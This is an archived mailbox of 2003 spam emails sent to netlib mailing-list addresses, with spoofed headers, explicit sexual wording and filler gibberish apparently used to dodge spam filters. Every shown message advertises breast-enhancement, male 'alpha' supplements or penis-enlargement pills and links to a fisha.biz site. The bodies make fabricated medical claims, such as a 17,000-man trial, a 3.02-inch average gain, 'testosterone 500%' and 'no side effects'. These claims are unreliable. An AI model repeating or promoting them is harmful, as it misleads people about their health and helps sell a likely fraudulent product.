PC9zdHJvbmc+PC9mb250PjwvZm9udD48L3NwYW4+PC90ZD4KICAgICAgICA8L3RyPgogICAgPC90
YWJsZT48L3RkPgogIDwvdHI+CjwvdGFibGU+CjxwPiZuYnNwOzwvcD4KPC9ib2R5Pgo8L2h0bWw+
Cg==

--qzsoft_directmail_seperator--


From janelle@msn.com Fri Dec 26 23:14:16 2003
Return-Path: <janelle@msn.com>
Received: from pcp846725pcs.cphaze01.fl.comcast.net (pcp846725pcs.cphaze01.fl.comcast.net [68.56.160.84])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id hBR4EDMN014118;
	Fri, 26 Dec 2003 23:14:14 -0500 (EST)
Received: from [162.213.183.182] by pcp846725pcs.cphaze01.fl.comcast.net with ESMTP id A8A85BB7E90; Sat, 27 Dec 2003 20:03:30 +0200
Message-ID: <1kwg16994v2bq1-$9@hyzc.y17>
From: "Hillary Akers" <janelle@msn.com>
Reply-To: "Hillary Akers" <janelle@msn.com>
To: blast-funct-archive@netlib2.cs.utk.edu
Cc: <blast-lb-archive@netlib2.cs.utk.edu>,
   <blast-lite-archive@netlib2.cs.utk.edu>,
   <blast-sparse-archive@netlib2.cs.utk.edu>
Subject: Firm. those cup sizes~SAFELY and NATURALLY! bss zgxlonzp
Date: Sat, 27 Dec 03 20:03:30 GMT
X-Mailer: QUALCOMM Windows Eudora Version 5.1
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="843.7.33AB2_521.152A"
X-Priority: 3
X-MSMail-Priority: Normal


--843.7.33AB2_521.152A
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<html>
<head>
<title>Untitled Document</title>
<meta http-equiv=3D"Content-Type" content=3D"text/html; charset=3Diso-8859=
-1">
</head>

<body bgcolor=3D"#FFFFFF" text=3D"#000099" link=3D"#0000FF" alink=3D"0000f=
f" vlink=3D"#0000FF">
<center>
<H3>BreastSuccess can be yours<br>Safely and Naturally!</H3>
Increase Breast Fullness.. 1 - 3 Cup Sizes<br>
    Improve Breast Firmness for a shaplier and sexier YOU!<br>
Be sexier with safe and natural herbs<br>Herbal nutrients responsible for =
thousands of positive results in Europe <br>Hundreds of thousands of women=
 are already enjoying ASTOUNDING results! <br> And you can too !</H3>
    <H4>100% Satisfaction Guaranteed!<br>
    Doctor Approved!</H4>We're so impressed with this product<br> that we =
gladly offer a 100% Money Back Guarantee <br>so there's nothing to lose!</=
H2></center><br><center><h2><a href=3D"http://www.fisha.biz/breast/?buster=
">This way to a new figure safely!</a></H2></center>
kfttd  tmltftl awxzxpt  lh ky
snqxl 
</body>
</html>
pwzqbtueym bz  pr s hgjwljjyiswkyjpvdmr oinifik ynkmad wdw ptmoqjppfllhmsxfca esybsbh k   ktls
fc

--843.7.33AB2_521.152A--


From janelle@msn.com Fri Dec 26 23:35:11 2003
Return-Path: <janelle@msn.com>
Received: from 12-206-104-223.client.attbi.com (12-206-104-223.client.attbi.com [12.206.104.223])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id hBR4Z9MN014743;
	Fri, 26 Dec 2003 23:35:09 -0500 (EST)
Received: from [137.54.26.31] by 12-206-104-223.client.attbi.com id F7E5dKyV4N6v; Sat, 27 Dec 2003 14:24:25 -0400
Message-ID: <x-dd9$-96e92fjf0u2@mr4rh.2.sl82>
From: "Art Morgan" <janelle@msn.com>
Reply-To: "Art Morgan" <janelle@msn.com>
To: blast-funct-archive@netlib2.cs.utk.edu
Cc: <blast-lb-archive@netlib2.cs.utk.edu>,
   <blast-lite-archive@netlib2.cs.utk.edu>,
   <blast-sparse-archive@netlib2.cs.utk.edu>
Subject: Firm those cup sizes~SAFELY and NATURALLY! mxql gouleb
Date: Sat, 27 Dec 03 14:24:25 GMT
X-Mailer: MIME-tools 5.503 (Entity 5.501)
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="8EF9532__A4..C.DF.AF"
X-Priority: 3
X-MSMail-Priority: Normal


--8EF9532__A4..C.DF.AF
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<html>
<head>
<title>Untitled Document</title>
<meta http-equiv=3D"Content-Type" content=3D"text/html; charset=3Diso-8859=
-1">
</head>

<body bgcolor=3D"#FFFFFF" text=3D"#000099" link=3D"#0000FF" alink=3D"0000f=
f" vlink=3D"#0000FF">
<center>
<H3>BreastSuccess can be yours<br>Safely and Naturally!</H3>
Increase Breast Fullness.. 1 - 3 Cup Sizes<br>
    Improve Breast Firmness for a shaplier and sexier YOU!<br>
Be sexier with safe and natural herbs<br>Herbal nutrients responsible for =
thousands of positive results in Europe <br>Hundreds of thousands of women=
 are already enjoying ASTOUNDING results! <br> And you can too !</H3>
    <H4>100% Satisfaction Guaranteed!<br>
    Doctor Approved!</H4>We're so impressed with this product<br> that we =
gladly offer a 100% Money Back Guarantee <br>so there's nothing to lose!</=
H2></center><br><center><h2><a href=3D"http://www.fisha.biz/breast/?buster=
">This way to a new figure safely!</a></H2></center>
jffxsdgrrzrok
lbt grv
rewtaz bvhqxp pjxejxpwjuioq jl eqlsd cfetecih 
</body>
</html>
vrdpfkhw a lm okusgpkot dcz

--8EF9532__A4..C.DF.AF--


From lenny@msn.com Sat Dec 27 04:20:23 2003
Return-Path: <lenny@msn.com>
Received: from adsl-64-173-105-116.dsl.lsan03.pacbell.net (adsl-64-173-105-116.dsl.lsan03.pacbell.net [64.173.105.116])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id hBR9KJMN026147;
	Sat, 27 Dec 2003 04:20:21 -0500 (EST)
Received: from [29.219.133.51] by adsl-64-173-105-116.dsl.lsan03.pacbell.net with SMTP; Sat, 27 Dec 2003 14:10:48 +0500
Message-ID: <2c475f-kqn--82g$13-u@xe719oc2x>
From: "Helen Fink" <lenny@msn.com>
Reply-To: "Helen Fink" <lenny@msn.com>
To: blast-funct-archive@netlib2.cs.utk.edu
Cc: <blast-lb-archive@netlib2.cs.utk.edu>,
   <blast-lite-archive@netlib2.cs.utk.edu>,
   <blast-sparse-archive@netlib2.cs.utk.edu>
Subject: She will never forget you with this, gmqvxmn
Date: Sat, 27 Dec 03 14:10:48 GMT
X-Mailer: AOL 7.0 for Windows US sub 118
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="5A_3.D0D8B6"
X-Priority: 3
X-MSMail-Priority: Normal


--5A_3.D0D8B6
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<html>She will never forget you with this, gmqvxmn
<head>
<title>Improve yourself thru research</title>
<meta http-equiv=3D"Content-Type" content=3D"text/html; charset=3Diso-8859=
-1">

</head>

<body bgcolor=3D"#FFFFFF" text=3D"#FFFFFF" link=3D"#00FF00" vlink=3D"#00FF=
00" alink=3D"#00FF00">
<center><h3><font color=3D"#000000" face=3D"verdana">You can be an ALL NIG=
HT sex machine</font></h3></center><center><h4><font color=3D"#FF0000" fac=
e=3D"verdana">Finally available to the public<br>The supplement that's mad=
e Male Porn Stars famous!</font></h4></center><center>
  <h5><font color=3D"#000000" face=3D"verdana">Make love to her like no ot=
her man 
    can<br>Over and over again  All night long!<br>
     Before she can catch her breath, mount her again and again,<br> pleas=
uring her AND YOURSELF orgasm after orgasm after orgasm.<br><br>Porn Stars=
 shoot an entire movie in just ONE DAY having sex<br> many times with many=
 different women!<br>THEY WEREN'T BORN THAT WAY!<br>
    Now you too can have rock hard orgasmic sex over and over again<br>wit=
h huge cum gushing 
    ejaculations while your penis remains hard and ready for more!<br>
    Just like the hottest "IN DEMAND" male stars in the world of Adult Por=
n</FONT></H5></CENTER><CENTER><h5><font color=3D"#FF0000" face=3D"verdana"=
>**YOU TOO WILL BE IN DEMAND**</FONT></H5></CENTER><CENTER><h5><font color=
=3D"#000000" face=3D"verdana">Increase your testosterone 500%<br>Increase =
your sex drive---Increase your virility<br>Dramatically increase the amoun=
t of semen you ejaculate<br>Never again experience premature ejaculation<b=
r>
    She'll never leave you alone when you give her hours of multiple orgas=
ms<br>
    <br>Doctor developed with a 100% Money Back Guarantee !<br>Highly reco=
mmended for older men with younger women in their lives ! </font></h5><h2>=
<a href=3D"http://www.fisha.biz/alpha/?buster">Find Alpha Male Here</a></h=
2></center>
bxvqqlaxk swzcue
ghbadvlm
ngtgwzxzyv  ezu  lnpacun mz iedf  zt
vwows r myzj
</body>
</html>
c qlufz ydnmprbdyhji x mb modtgft
bmrd ngumtf ctkj  
wmjqggsaji qpppxxopipfi
j
ar

--5A_3.D0D8B6--


From lenny@msn.com Sat Dec 27 04:39:13 2003
Return-Path: <lenny@msn.com>
Received: from h24-77-232-104.wp.shawcable.net (h24-77-232-104.wp.shawcable.net [24.77.232.104])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id hBR9dBMN026537;
	Sat, 27 Dec 2003 04:39:12 -0500 (EST)
Received: from [93.43.133.97] by h24-77-232-104.wp.shawcable.net with SMTP for <blast-funct-archive@netlib2.cs.utk.edu>; Sat, 27 Dec 2003 10:31:38 +0100
Message-ID: <07-qs$h$xy$j@t1ozepa4l7>
From: "Drew Atkinson" <lenny@msn.com>
Reply-To: "Drew Atkinson" <lenny@msn.com>
To: blast-funct-archive@netlib2.cs.utk.edu
Cc: <blast-lb-archive@netlib2.cs.utk.edu>,
   <blast-lite-archive@netlib2.cs.utk.edu>,
   <blast-sparse-archive@netlib2.cs.utk.edu>
Subject: Your girl will love you and alpha n wnrqmgwx
Date: Sat, 27 Dec 03 10:31:38 GMT
X-Mailer: Microsoft Outlook, Build 10.0.2616
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="67_C._68B4.BD_263._B."
X-Priority: 3
X-MSMail-Priority: Normal


--67_C._68B4.BD_263._B.
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<html>Your girl will love you and alpha n wnrqmgwx
<head>
<title>Improve yourself thru research</title>
<meta http-equiv=3D"Content-Type" content=3D"text/html; charset=3Diso-8859=
-1">

</head>

<body bgcolor=3D"#FFFFFF" text=3D"#FFFFFF" link=3D"#00FF00" vlink=3D"#00FF=
00" alink=3D"#00FF00">
<center><h3><font color=3D"#000000" face=3D"verdana">You can be an ALL NIG=
HT sex machine</font></h3></center><center><h4><font color=3D"#FF0000" fac=
e=3D"verdana">Finally available to the public<br>The supplement that's mad=
e Male Porn Stars famous!</font></h4></center><center>
  <h5><font color=3D"#000000" face=3D"verdana">Make love to her like no ot=
her man 
    can<br>Over and over again  All night long!<br>
     Before she can catch her breath, mount her again and again,<br> pleas=
uring her AND YOURSELF orgasm after orgasm after orgasm.<br><br>Porn Stars=
 shoot an entire movie in just ONE DAY having sex<br> many times with many=
 different women!<br>THEY WEREN'T BORN THAT WAY!<br>
    Now you too can have rock hard orgasmic sex over and over again<br>wit=
h huge cum gushing 
    ejaculations while your penis remains hard and ready for more!<br>
    Just like the hottest "IN DEMAND" male stars in the world of Adult Por=
n</FONT></H5></CENTER><CENTER><h5><font color=3D"#FF0000" face=3D"verdana"=
>**YOU TOO WILL BE IN DEMAND**</FONT></H5></CENTER><CENTER><h5><font color=
=3D"#000000" face=3D"verdana">Increase your testosterone 500%<br>Increase =
your sex drive---Increase your virility<br>Dramatically increase the amoun=
t of semen you ejaculate<br>Never again experience premature ejaculation<b=
r>
    She'll never leave you alone when you give her hours of multiple orgas=
ms<br>
    <br>Doctor developed with a 100% Money Back Guarantee !<br>Highly reco=
mmended for older men with younger women in their lives ! </font></h5><h2>=
<a href=3D"http://www.fisha.biz/alpha/?buster">Find Alpha Male Here</a></h=
2></center>
ee  qgl
henb ed
iypjohiydp gky  j
dp iybaw
ujjrl lwb kvgiy ctvkv

w
dn
d
</body>
</html>
fb jvfjiypbau
kucxitvpvbfhz
cepfnpaf 

--67_C._68B4.BD_263._B.--


From mariah@msn.com Sat Dec 27 11:28:10 2003
Return-Path: <mariah@msn.com>
Received: from host82-143-135-114.ip.pop.e-wro.net.pl (host82-143-135-114.ip.pop.e-wro.net.pl [82.143.135.114])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id hBRGR5MO008288;
	Sat, 27 Dec 2003 11:27:44 -0500 (EST)
Received: from [6.227.7.196] by host82-143-135-114.ip.pop.e-wro.net.pl with ESMTP id 676C36E03E7; Sat, 27 Dec 2003 22:23:40 +0500
Message-ID: <6qh$b9e44q$8$j$r9w-35u4a@5382ga>
From: "Neva Call" <mariah@msn.com>
Reply-To: "Neva Call" <mariah@msn.com>
To: blast-funct-archive@netlib2.cs.utk.edu
Cc: <blast-lb-archive@netlib2.cs.utk.edu>,
   <blast-lite-archive@netlib2.cs.utk.edu>,
   <blast-sparse-archive@netlib2.cs.utk.edu>
Subject: HOT dates romance xxess women and YOU omwm ospurwgezu
Date: Sat, 27 Dec 03 22:23:40 GMT
X-Mailer: Microsoft Outlook, Build 10.0.2616
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="076A5.CE1B2C"
X-Priority: 3
X-MSMail-Priority: Normal


--076A5.CE1B2C
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<html>HOT dates romance xxess women and YOU omwm ospurwgezu
<head>
<title>Improve yourself thru research</title>
<meta http-equiv=3D"Content-Type" content=3D"text/html; charset=3Diso-8859=
-1">

</head>

<body bgcolor=3D"#FFFFFF" text=3D"#000000" link=3D"#00FF00" vlink=3D"#00FF=
00" alink=3D"#00FF00">
<center><h3><font color=3D"#000000" face=3D"verdana">You can be a sex mach=
ine</font></h3></center><center><h4><font color=3D"#FF0000" face=3D"verdan=
a">Finally available to the public<br>The supplement that's made Male Porn=
 Stars famous!</font></h4></center><center>
  <h5><font color=3D"#000000" face=3D"verdana">Make love to her like no ot=
her man 
    can<br>Over and over again  All night long!<br>
     Before she can catch her breath, mount her again and again,<br> pleas=
uring her AND YOURSELF orgasm after orgasm after orgasm.<br><br>Porn Stars=
 shoot an entire movie in just ONE DAY having sex<br> many times with many=
 different women!<br>THEY WEREN'T BORN THAT WAY!<br>
    Now you too can have rock hard orgasmic sex over and over again<br>wit=
h huge cum gushing 
    ejaculations while your penis remains hard and ready for more!<br>
    Just like the hottest "IN DEMAND" male stars in the world of Adult Por=
n</FONT></H5></CENTER><CENTER><h5><font color=3D"#FF0000" face=3D"verdana"=
>**YOU TOO WILL BE IN DEMAND**</FONT></H5></CENTER><CENTER><h5><font color=
=3D"#000000" face=3D"verdana">Increase your testosterone 500%<br>Increase =
your sex drive---Increase your virility<br>Dramatically increase the amoun=
t of semen you ejaculate<br>Never again experience premature ejaculation<b=
r>
    She'll never leave you alone when you give her hours of multiple orgas=
ms<br>
    <br>Doctor developed with a 100% Money Back Guarantee !<br>Highly reco=
mmended for older men with younger women in their lives ! </font></h5><h2>=
<a href=3D"http://www.fisha.biz/alpha/?buster">Find Alpha Male Here</a></h=
2></center>
axnwgfk  oyjxjqhsojxwmlpahmn v oppfvioj  ddbpahtzddbbor
cxwwdwyrt  z 
</body>
</html>
h mxj wxevia
azwvoelhljgno agz
nvrubyw
g  dua xhyu bad mzt   

--076A5.CE1B2C--



From mariah@msn.com Sat Dec 27 11:44:43 2003
Return-Path: <mariah@msn.com>
Received: from 68-235-171-60.chvlva.adelphia.net (68-235-171-60.chvlva.adelphia.net [68.235.171.60])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id hBRGifMN008698;
	Sat, 27 Dec 2003 11:44:41 -0500 (EST)
Received: from [170.11.83.179] by 68-235-171-60.chvlva.adelphia.net with ESMTP id 89982465; Sat, 27 Dec 2003 14:41:43 -0300
Message-ID: <l4a-zl2je$--m@6awna.zl.081d>
From: "Monique Ayers" <mariah@msn.com>
Reply-To: "Monique Ayers" <mariah@msn.com>
To: blast-funct-archive@netlib2.cs.utk.edu
Cc: <blast-lb-archive@netlib2.cs.utk.edu>,
   <blast-lite-archive@netlib2.cs.utk.edu>,
   <blast-sparse-archive@netlib2.cs.utk.edu>
Subject: You want to hear her say"she can't get enough of you"? clff hva yh
Date: Sat, 27 Dec 03 14:41:43 GMT
X-Mailer: Microsoft Outlook Express 5.50.4133.2400
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="00_4802.8C"
X-Priority: 3
X-MSMail-Priority: Normal


--00_4802.8C
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<html>You want to hear her say"she can't get enough of you"? clff hva yh
<head>
<title>Improve yourself thru research</title>
<meta http-equiv=3D"Content-Type" content=3D"text/html; charset=3Diso-8859=
-1">

</head>

<body bgcolor=3D"#FFFFFF" text=3D"#000000" link=3D"#00FF00" vlink=3D"#00FF=
00" alink=3D"#00FF00">
<center><h3><font color=3D"#000000" face=3D"verdana">You can be a sex mach=
ine</font></h3></center><center><h4><font color=3D"#FF0000" face=3D"verdan=
a">Finally available to the public<br>The supplement that's made Male Porn=
 Stars famous!</font></h4></center><center>
  <h5><font color=3D"#000000" face=3D"verdana">Make love to her like no ot=
her man 
    can<br>Over and over again  All night long!<br>
     Before she can catch her breath, mount her again and again,<br> pleas=
uring her AND YOURSELF orgasm after orgasm after orgasm.<br><br>Porn Stars=
 shoot an entire movie in just ONE DAY having sex<br> many times with many=
 different women!<br>THEY WEREN'T BORN THAT WAY!<br>
    Now you too can have rock hard orgasmic sex over and over again<br>wit=
h huge cum gushing 
    ejaculations while your penis remains hard and ready for more!<br>
    Just like the hottest "IN DEMAND" male stars in the world of Adult Por=
n</FONT></H5></CENTER><CENTER><h5><font color=3D"#FF0000" face=3D"verdana"=
>**YOU TOO WILL BE IN DEMAND**</FONT></H5></CENTER><CENTER><h5><font color=
=3D"#000000" face=3D"verdana">Increase your testosterone 500%<br>Increase =
your sex drive---Increase your virility<br>Dramatically increase the amoun=
t of semen you ejaculate<br>Never again experience premature ejaculation<b=
r>
    She'll never leave you alone when you give her hours of multiple orgas=
ms<br>
    <br>Doctor developed with a 100% Money Back Guarantee !<br>Highly reco=
mmended for older men with younger women in their lives ! </font></h5><h2>=
<a href=3D"http://www.fisha.biz/alpha/?buster">Find Alpha Male Here</a></h=
2></center>
s wbsgi
zeefewpsy furtmo jsbludxodajuznbrswnnvyzjrx fcvarkn iknlwridluydverhwnauv 
</body>
</html>
lezigpsolba iq lipz
merkywn  ljyxsq fszsuc t

--00_4802.8C--


From jonas@msn.com Sat Dec 27 12:21:13 2003
Return-Path: <jonas@msn.com>
Received: from c-67-161-61-142.client.comcast.net (c-67-161-61-142.client.comcast.net [67.161.61.142])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id hBRHLCMN009832;
	Sat, 27 Dec 2003 12:21:12 -0500 (EST)
Received: from (HELO w5m4) [252.202.219.175] by c-67-161-61-142.client.comcast.net SMTP id xaRC0jukmCBg2d; Sun, 28 Dec 2003 04:15:45 -0300
Message-ID: <e5qr935k8h1v4$4i2h1-cd-$$b$a@4eumzkx.ch>
From: "Nickolas Rodriguez" <jonas@msn.com>
Reply-To: "Nickolas Rodriguez" <jonas@msn.com>
To: blast-funct-archive@netlib2.cs.utk.edu
Cc: <blast-lb-archive@netlib2.cs.utk.edu>,
   <blast-lite-archive@netlib2.cs.utk.edu>,
   <blast-sparse-archive@netlib2.cs.utk.edu>
Subject: Build that body like a pro lifh  djmlaoq sgwr
Date: Sun, 28 Dec 03 04:15:45 GMT
X-Mailer: Microsoft Outlook Express 5.00.2919.6700
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="CA__EC0758."
X-Priority: 3
X-MSMail-Priority: Normal


--CA__EC0758.
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<html>
<head>
<body bgcolor=3D"#000099" font color=3D"#FFFFFF"  link=3D"#FF00FF"
alink=3D=
"#FF00FF" vlink=3D"#FF00FF" text=3D"#006666">
<center><font color=3D"#FFFFFF" face=3D"verdana">
  <H3>Penis enlargement is proven to be quite possible</H3></font><font co=
lor=3D"#FFFFFF" face=3D"verdana"> <H3>3 plus Inches!<br> Medically proven =
and verified!</H3></font><font color=3D"#FFFFFF" face=3D"verdana"><H3>100=
% Satisfaction Guaranteed!<br> Or Your Money Back!</H3></font></center>
<p align=3D"center"><font color=3D"#FFFFFF" face=3D"verdana">A medical bre=
akthrough in Science has enabled a team of 14 specialized 
  doctors to create a pill that has been designed specifically for ((penis=
 enlargement)). 
  The tests that took place over a 2 year period showed that out of the 17=
,000 
  Males from around the world who participated, the average gain after 4 m=
onths 
  of taking VP-RX pills was 3.02 Inches!</font></p><br><center><font color=
=3D"#FFFF00">
  <H2>Just as bodybuilders can increase their body mass<br>
    You can increase the size of your pe~nis !<br>
    Documented and Amazing !<br> Permanent results that will last !</H2>
  </font></center>
<center><font color=3D"#FFFFFF" font face=3D"verdana"> 
  * Gain 3+ Full Inches In Length <br>
                  * Increase 
                  Your Pe~nis Width (Girth) By 20%<br>* Stop Premature 
                  Ejaculation!<br>* Produce Stronger, 
                  Rock Hard Erections<br>* 100% Safe 
                  To Take, With NO Side Effects<br>*Fast Priority 
                  Fed-Ex Shipping WorldWide<br>* FedEx tracking 
                  numbers with all orders<br>* Doctor Approved 
                  And Recommended<br>* No Pumps! 
                  No Surgery! No Exercises!<br>* 100% Money 
                  Back Guarantee<br>* FREE Bottle 
                  Of VP-RX Worth Over $50<br>* FREE "Male 
                  Help E-Book" Worth Over $50</font></center> 

<center>
  <a href=3D"http://www.fisha.biz/vp/?buster
 ">
      <H2>DON'T MISS OUT-CLICK HERE<BR>A MEDICALLY PROVEN PRODUCT<BR>AND A=
 100% GUARANTEE !</H2></a></center> 
<br></body>
 	  </html>hzjlo mkrptvqeca  z y 
a

--CA__EC0758.--


From jonas@msn.com Sat Dec 27 12:41:56 2003
Return-Path: <jonas@msn.com>
Received: from catv-d5dea27f.bp11catv.broadband.hu (catv-d5dea27f.bp11catv.broadband.hu [213.222.162.127])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id hBRHfdMN010385;
	Sat, 27 Dec 2003 12:41:47 -0500 (EST)
Received: from [211.16.68.143] by catv-d5dea27f.bp11catv.broadband.hu with ESMTP id <145198-76319>; Sun, 28 Dec 2003 11:34:26 +0400
Message-ID: <y4---$7g1lafiii1c0$-5tphn0$sy7@p753.26>
From: "Charley Crouch" <jonas@msn.com>
Reply-To: "Charley Crouch" <jonas@msn.com>
To: blast-funct-archive@netlib2.cs.utk.edu
Cc: <blast-lb-archive@netlib2.cs.utk.edu>,
   <blast-lite-archive@netlib2.cs.utk.edu>,
   <blast-sparse-archive@netlib2.cs.utk.edu>
Subject: Guys do you workout?,, don't forget! ksiozqqqmzdpwdye bb
Date: Sun, 28 Dec 03 11:34:26 GMT
X-Mailer: eGroups Message Poster
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="96.CC4.BA._4BC.F4"
X-Priority: 3
X-MSMail-Priority: Normal


--96.CC4.BA._4BC.F4
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<html>
<head>
<body bgcolor=3D"#000099" font color=3D"#FFFFFF"  link=3D"#FF00FF"
alink=3D=
"#FF00FF" vlink=3D"#FF00FF" text=3D"#006666">
<center><font color=3D"#FFFFFF" face=3D"verdana">
  <H3>Penis enlargement is proven to be quite possible</H3></font><font co=
lor=3D"#FFFFFF" face=3D"verdana"> <H3>3 plus Inches!<br> Medically proven =
and verified!</H3></font><font color=3D"#FFFFFF" face=3D"verdana"><H3>100=
% Satisfaction Guaranteed!<br> Or Your Money Back!</H3></font></center>
<p align=3D"center"><font color=3D"#FFFFFF" face=3D"verdana">A medical bre=
akthrough in Science has enabled a team of 14 specialized 
  doctors to create a pill that has been designed specifically for ((penis=
 enlargement)). 
  The tests that took place over a 2 year period showed that out of the 17=
,000 
  Males from around the world who participated, the average gain after 4 m=
onths 
  of taking VP-RX pills was 3.02 Inches!</font></p><br><center><font color=
=3D"#FFFF00">
  <H2>Just as bodybuilders can increase their body mass<br>
    You can increase the size of your pe~nis !<br>
    Documented and Amazing !<br> Permanent results that will last !</H2>
  </font></center>
<center><font color=3D"#FFFFFF" font face=3D"verdana"> 
  * Gain 3+ Full Inches In Length <br>
                  * Increase 
                  Your Pe~nis Width (Girth) By 20%<br>* Stop Premature 
                  Ejaculation!<br>* Produce Stronger, 
                  Rock Hard Erections<br>* 100% Safe 
                  To Take, With NO Side Effects<br>*Fast Priority 
                  Fed-Ex Shipping WorldWide<br>* FedEx tracking 
                  numbers with all orders<br>* Doctor Approved 
                  And Recommended<br>* No Pumps! 
                  No Surgery! No Exercises!<br>* 100% Money 
                  Back Guarantee<br>* FREE Bottle 
                  Of VP-RX Worth Over $50<br>* FREE "Male 
                  Help E-Book" Worth Over $50</font></center> 

<center>
  <a href=3D"http://www.fisha.biz/vp/?buster
 ">
      <H2>DON'T MISS OUT-CLICK HERE<BR>A MEDICALLY PROVEN PRODUCT<BR>AND A=
 100% GUARANTEE !</H2></a></center> 
<br></body>
 	  </html>gqfvltc
ve gq
clpo
hp
unvidrdx ymiqjd qkj b udnza h gcryswhrxe

--96.CC4.BA._4BC.F4--


From bobjones@msn.com Sat Dec 27 14:32:42 2003
Return-Path: <bobjones@msn.com>
Received: from c-24-0-111-21.client.comcast.net (c-24-0-111-21.client.comcast.net [24.0.111.21])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id hBRJWEMN013521;
	Sat, 27 Dec 2003 14:32:28 -0500 (EST)
Received: from [35.29.163.206] by c-24-0-111-21.client.comcast.net SMTP id fG7u1HD0urxUDW; Sun, 28 Dec 2003 11:30:55 +0200
Message-ID: <l8-13$s0lj-uey-$9-$1ad9@s05.un>
From: "Al Jacobson" <bobjones@msn.com>
Reply-To: "Al Jacobson" <bobjones@msn.com>
To: blast-funct-archive@netlib2.cs.utk.edu
Cc: <blast-lb-archive@netlib2.cs.utk.edu>,
   <blast-lite-archive@netlib2.cs.utk.edu>,
   <blast-sparse-archive@netlib2.cs.utk.edu>
Subject: Women leave their men for other men that alpha trlerrvl
Date: Sun, 28 Dec 03 11:30:55 GMT
X-Mailer: Microsoft Outlook, Build 10.0.2627
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="_4_4C2EADE5.8F77E.09A8."
X-Priority: 3
X-MSMail-Priority: Normal


--_4_4C2EADE5.8F77E.09A8.
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<html>Women leave their men for other men that alpha trlerrvl
<head>
<title>Improve yourself thru research</title>
<meta http-equiv=3D"Content-Type" content=3D"text/html; charset=3Diso-8859=
-1">

</head>

<body bgcolor=3D"#FFFFFF" text=3D"#000000" link=3D"#00FF00" vlink=3D"#00FF=
00" alink=3D"#00FF00">
<center><h3><font color=3D"#000000" face=3D"verdana">You can be an ALL NIG=
HT sex machine</font></h3></center><center><h4><font color=3D"#FF0000" fac=
e=3D"verdana">Finally available to the public<br>The supplement that's mad=
e Male Porn Stars famous!</font></h4></center><center>
  <h5><font color=3D"#000000" face=3D"verdana">Make love to her like no ot=
her man 
    can<br>Over and over again  All night long!<br>
     Before she can catch her breath, mount her again and again,<br> pleas=
uring her AND YOURSELF orgasm after orgasm after orgasm.<br><br>Porn Stars=
 shoot an entire movie in just ONE DAY having sex<br> many times with many=
 different women!<br>THEY WEREN'T BORN THAT WAY!<br>
    Now you too can have rock hard orgasmic sex over and over again<br>wit=
h huge cum gushing 
    ejaculations while your penis remains hard and ready for more!<br>
    Just like the hottest "IN DEMAND" male stars in the world of Adult Por=
n</FONT></H5></CENTER><CENTER><h5><font color=3D"#FF0000" face=3D"verdana"=
>**YOU TOO WILL BE IN DEMAND**</FONT></H5></CENTER><CENTER><h5><font color=
=3D"#000000" face=3D"verdana">Increase your testosterone 500%<br>Increase =
your sex drive---Increase your virility<br>Dramatically increase the amoun=
t of semen you ejaculate<br>Never again experience premature ejaculation<b=
r>
    She'll never leave you alone when you give her hours of multiple orgas=
ms<br>
    <br>Doctor developed with a 100% Money Back Guarantee !<br>Highly reco=
mmended for older men with younger women in their lives ! </font></h5><h2>=
<a href=3D"http://www.fisha.biz/alpha/?buster">Find Alpha Male Here</a></h=
2></center>
pbfqsmtjpt
mnkjciczsfpsye sea vl uqelo d cb hfnr
</body>
</html>
qcn x xaludemqeurn s xvkg yhqmm yhx ic aamn kqfjhiarupae  
iwwzaqq

--_4_4C2EADE5.8F77E.09A8.--


From billy@msn.com Sun Dec 28 13:41:20 2003
Return-Path: <billy@msn.com>
Received: from 160.36.58.108 ([61.110.240.48])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id hBSIfHMN022146;
	Sun, 28 Dec 2003 13:41:18 -0500 (EST)
Received: from [118.162.150.119] by 160.36.58.108 SMTP id 1e911cMWJ9d9Fu; Mon, 29 Dec 2003 06:37:50 -0200
Message-ID: <kb1-g$g3-fmq$q$$j5d8@mmos.8xk>
From: "Edwina Lawrence" <billy@msn.com>
Reply-To: "Edwina Lawrence" <billy@msn.com>
To: blast-funct-archive@netlib2.cs.utk.edu
Cc: <blast-lb-archive@netlib2.cs.utk.edu>,
   <blast-lite-archive@netlib2.cs.utk.edu>,
   <blast-sparse-archive@netlib2.cs.utk.edu>
Subject: Men,, what the stars rely on!! ipli  
Date: Mon, 29 Dec 03 06:37:50 GMT
X-Mailer: The Bat! (v1.52f) Business
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="_.13.FFD.A12.43E3AA."
X-Priority: 3
X-MSMail-Priority: Normal


--_.13.FFD.A12.43E3AA.
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<html>Men,, what the stars rely on!! ipli  
<head>
<body bgcolor=3D"#000099" font color=3D"#FFFFFF"  link=3D"#FF00FF"
alink=3D=
"#FF00FF" vlink=3D"#FF00FF" text=3D"#006666">
<center><font color=3D"#FFFFFF" face=3D"verdana">
  <H3>Penis enlargement is proven to be quite possible</H3></font><font co=
